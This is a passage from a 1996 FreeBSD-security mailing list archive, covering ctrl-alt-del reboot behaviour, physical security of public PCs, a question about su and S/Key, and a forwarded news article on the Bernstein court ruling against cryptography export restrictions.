FreeBSD.org Precedence: bulk > > Snob Art Genre wrote: > > > > I think ctrl-alt-del syncs buffers and otherwise shuts down the machine > > "nicely". I may be wrong. > > > > You are right. It send a -INT to init. So it is equivalent of shutdown -r. > > > -Guido > /me recognizes my mistake. Thanks to everybody for being patient. :-) IgoR aka StR From owner-freebsd-security Fri Dec 20 09:03:41 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id JAA27640 for security-outgoing; Fri, 20 Dec 1996 09:03:41 -0800 (PST) Received: from foobar.gw2kbbs.com (foobar.gw2kbbs.com [205.217.137.150]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id JAA27635 for ; Fri, 20 Dec 1996 09:03:38 -0800 (PST) Received: from blue ([10.12.5.66]) by foobar.gw2kbbs.com (8.7.5/8.6.11) with SMTP id LAA18794; Fri, 20 Dec 1996 11:03:29 -0600 (CST) Message-ID: <32BAD160.E46@gw2kbbs.com> Date: Fri, 20 Dec 1996 11:48:16 -0600 From: Tyson Reply-To: tysonb@gw2kbbs.com X-Mailer: Mozilla 2.02E (OS/2; I) MIME-Version: 1.0 To: Igor Roshchin CC: freebsd-security@freebsd.org Subject: Re: stopping users from rebooting with ctr-alt-del References: <199612201504.JAA23349@alecto.physics.uiuc.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Igor Roshchin wrote: > In a public place I would also disable "reset" and "power" button > This illustrates the need for physical security. Any terminal other than console and possibly an alternate has no business being able to reboot the cpu. So far as security on PC's goes, I would also mention that it is a good idea to operate on a least priviledge mode when thinking security. I go so far as to pull the screws from the floppy drive, push the floppy further inside the case, and slap a bay cover on top. Same for CD-ROM's. It's the out of sight, out of mind principle. The newer ATX cases present some good possibilities as well, as now you can move/hide the power switch as well as the reset switch. Even then I wind up hearing about a luser who tries to get around that. I usually then point them to the "Simon, BOFH" documents, and ask them if they'd like that. For some reason, they start to behaving themselves. I wonder why. };-) > From owner-freebsd-security Fri Dec 20 14:01:52 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA11234 for security-outgoing; Fri, 20 Dec 1996 14:01:52 -0800 (PST) Received: from ns2.harborcom.net (root@ns2.harborcom.net [206.158.4.4]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA11229 for ; Fri, 20 Dec 1996 14:01:50 -0800 (PST) Received: from swoosh.dunn.org (swoosh.dunn.org [206.158.7.243]) by ns2.harborcom.net (8.8.4/8.8.4) with SMTP id RAA07736 for ; Fri, 20 Dec 1996 17:01:49 -0500 (EST) Date: Fri, 20 Dec 1996 16:57:27 -0500 () From: Bradley Dunn To: freebsd-security@freebsd.org Subject: Why doesn't su call skeyaccess()? Message-ID: X-X-Sender: bradley@harborcom.net MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk The subject says it all. :) -BD From owner-freebsd-security Sat Dec 21 21:47:17 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id VAA20399 for security-outgoing; Sat, 21 Dec 1996 21:47:17 -0800 (PST) Received: from long.yar.ru (ldv@long.yar.ru [193.233.50.2]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id VAA20394 for ; Sat, 21 Dec 1996 21:46:56 -0800 (PST) Received: from localhost (ldv@localhost) by long.yar.ru (8.8.2/8.8.2) with SMTP id IAA01002 for ; Sun, 22 Dec 1996 08:46:31 +0300 Date: Sun, 22 Dec 1996 08:46:31 +0300 (MSK) From: "Dmitri V. Lukyanov" To: security@freebsd.org Subject: (fwd) FYI: Crypto Restrictions Unconstitutional - US Court Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hi, Is this the end of FreeBSD password encryption problems? From: Mark Hemment Date: Fri, 20 Dec 1996 18:50:21 +0000 (GMT) Subject: FYI: Crypto Restrictions Unconstitutional - US Court I was forwarded this today. The ruling does not affect export, but it's interesting that "computer source code is protect speech for purposes of the First Amendment"! This is slightly off-topic, although it does relate to Linus's move to the US and encryption in the Linux kernel. Regards, markhe ===================================================================== ======= SUBJECT: COURT DECLARES CRYPTO RESTRICTIONS UNCONSTITUTIONAL SOURCE: Newsbytes via First! by Individual, Inc. DATE: December 19, 1996 INDEX: [15] - --------------------------------------------------------------------- - ------- WASHINGTON, DC, U.S.A., 1996 DEC 19 (NB) via Individual Inc. -- By Bill Pietrucha. Cold War export restrictions on cryptography received a major blow this week when a federal judge ruled that the Arms Export Control Act is an unconstitutional prior restraint on free speech. The ruling, hailed by the computer industry and privacy advocates, was a setback for the Clinton Administration's efforts to build wiretap-ready" computers, set-top boxes, telephones, and consumer electronics. The case focused on Daniel J. Bernstein, a research assistant professor at the University of Illinois at Chicago, who developed an encryption algorithm, or set of instructions. Bernstein planned to publish his encryption algorithm, called Snuffle, in academic journals and on the Internet. Snuffle scrambles, or encodes, telephone and computer messages that move across computer networks and the Internet. The messages can be read by using Unsnuffle, Bernstein's decryption program. The federal government, however, told Bernstein he would have to register as an arms dealer and seek government permission before publication, as is required by the Arms Export Control Act and the International Traffic in Arms Regulations. Bernstein sued the government, claiming the government's requirements violated his First Amendment right of free speech. Earlier this year, the government argued that since Bernstein's ideas were expressed, in part, in computer language, or source code, they were not protected by the First Amendment. US District Court Judge Marilyn Hall Patel rejected the government's argument on April 15 of this year, and held for the first time that computer source code is protected speech for purposes of the First Amendment. On Monday, Judge Patel ruled that the Arms Export Control Act is an unconstitutional prior restraint on speech, because it requires Bernstein to submit his ideas about cryptography to the government for review, to register as an arms dealer, and to apply for and obtain from the government a license to publish his ideas. Using the Pentagon Papers case as precedent, Judge Patel ruled that the government's "interest of national security alone does not justify a prior restraint." Under the Constitution, she said, Bernstein now is free to publish his ideas without asking the government's permission first. Judge Patel also held that the government's required licensing procedure fails to provide adequate procedural safeguards. The immediate effect of Judge Patel's decision is that Bernstein now is free to teach his January 13th cryptography class, and can post his class materials on the Internet, Mike Godwin, a lawyer for the Electronic Frontier Foundation, said. "I'm very pleased," Bernstein said. "Now I won't have to tell my students to burn their notebooks." The long-range effects, however, still are cloudy, since Judge Patel's decision only legally applies to Prof. Bernstein. Other people and companies are still technically required to follow the export restrictions when speaking or publishing about cryptography, or when speaking or publishing cryptographic source code. The decision, however, sends a strong signal that if the government tried to enforce these rules against other people, the courts are likely to strike them down again, Godwin said. Judge Patel has specifically not decided whether the export controls on object code, the executable form of computer programs which source code is automatically translated into, are constitutional. Existing export controls will continue to apply to runnable software products, such as Netscape's browser, until another court case challenges that part of the restrictions. In a November Executive Order, President Clinton offered limited administrative exemptions from these restrictions to companies which agree to undermine the privacy of their customers, Godwin said. "Federal District Judge Patel's ruling knocks both the carrot and the stick out of Clinton's hand," he said, "because the restrictions were unconstitutional in the first place." Jim Bidzos, president of RSA Data Security, one of the companies most affected by the government's cryptography policies, said, "this is a positive sign in the crypto wars, the first rational statement concerning crypto policy to come out of any part of the government." "It's nice to see that the executive branch does not get to decide whether we have the right of free speech," PGP Inc. chairman Philip Zimmermann said. "It shows that my own common sense interpretation of the constitution was correct five years ago when I thought it was safe to publish my own software, PGP. If only US Customs had seen it that way." Zimmermann was investigated by the government when he wrote and gave away a program for protecting the privacy of e-mail. His "Pretty Good Privacy" program is used by human rights activists worldwide to protect their workers and informants from torture and murder by their own countries' secret police. Jerry Berman, executive director of the Center for Democracy and Technology, a Washington-based Internet advocacy group, hailed the victory, saying "the Bernstein ruling illustrates that the Administration continues to embrace an encryption policy that is not only unwise, but also unconstitutional." The full text of the lawsuit and other paperwork filed in the case is available from EFF's online archives at http://www.eff.org on the Internet. (19961219/Press Contact: Shari Steele, Electronic Frontier Foundation, 301-375-8856; e-mail ssteele@eff.org Reported by Newsbytes News Network at http://www.newsbytes.com) "The Pulse of the Information Age" Newsbytes News Network http://www.newsbytes.com 24-hour computer, telecom and online news [12-19-96 at 15:00 EST, Copyright 1996, Newsbytes News Network., File: n1219004.6by] Copyright (c) 1996 by INDIVIDUAL, Inc. All rights reserved.